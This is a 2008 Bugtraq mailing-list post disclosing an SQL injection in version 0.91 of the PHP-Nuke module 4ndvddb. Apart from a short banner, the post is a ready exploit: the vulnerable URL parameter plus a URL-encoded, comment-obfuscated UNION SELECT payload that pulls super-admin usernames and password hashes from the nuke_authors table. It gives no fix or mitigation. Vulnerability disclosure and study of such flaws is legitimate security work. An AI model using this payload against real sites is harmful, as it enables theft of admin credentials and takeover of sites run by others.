[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PHP-NUKE SQL Module's Name 4ndvddb

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP-NUKE SQL Module's Name 4ndvddb
From: lovebug@xxxxxxxxxx
Date: 7 Jul 2008 19:24:55 -0000

 Module's Name: 4ndvddb
 Module's Version: 0.91
 
+---------------------------------------+
|  SQL Injection Vulnerability PHP-NUKE 
  | Module's Name: 4ndvddb
|          Module's Version: 0.91     |
|         found by lovebug       |
|            RBT-4 |
            www.rbt-4.net
+---------------------------------------+


#vuln: modules.php?name=4ndvddb&rop=show_dvd&id=

#sql= 
1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,3,4,5,6,7,8,9,10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

Prev by Date: [ GLSA 200807-03 ] PCRE: Buffer overflow
Next by Date: Pwnie Awards 2008
Previous by thread: [ GLSA 200807-03 ] PCRE: Buffer overflow
Next by thread: Pwnie Awards 2008
Index(es):
- Date
- Thread